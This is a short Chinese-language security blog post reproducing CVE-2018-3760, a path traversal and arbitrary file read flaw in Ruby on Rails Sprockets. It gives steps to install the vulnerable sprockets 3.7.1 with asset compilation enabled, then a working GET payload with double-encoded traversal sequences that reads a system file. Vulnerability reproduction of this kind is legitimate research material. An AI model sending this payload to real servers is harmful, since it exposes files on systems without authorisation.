Ruby on Rails 路径穿越与任意文件读取漏洞分析 CVE-2018-3760

  • A+
所属分类:网络安全文章

漏洞复现

本地安装好ruby和rails。以ruby 2.4.4 ,rails v5.0.7为例

此时blog这个rails项目使用的sprockets版本是3.7.2(fixed)。修改blog目录下的Gemfile.lock第122行:

sprockets (3.7.1)

修改配置文件 config/environments/production.rb

config.assets.compile = true

在blog目录下执行

  1. $ bundle install
  2. $ rails server
  3.     * Min threads: 5, max threads: 5
  4.     * Environment: development
  5.     * Listening on tcp://0.0.0.0:3000                          
  6.     Use Ctrl-C to stop

PayLoad

  1. GET /assets/file:%2f%2f//C:/chybeta/blog/app/assets/config/%252e%252e%2f%252e%2e%2f%252e%2e%2f%252e%2e%2f%252e%2e%2f%252e%2e%2f%252e%2e%2fWindows/win.ini

Windows
Ruby on Rails 路径穿越与任意文件读取漏洞分析 CVE-2018-3760

Linux
Ruby on Rails 路径穿越与任意文件读取漏洞分析 CVE-2018-3760

  • 服务器购买微信群
  • 阿里云&腾讯云&国外VPS
  • weinxin
  • 服务器购买QQ群
  • 阿里云&腾讯云&国外VPS
  • weinxin
CE安全网

发表评论

您必须登录才能发表评论!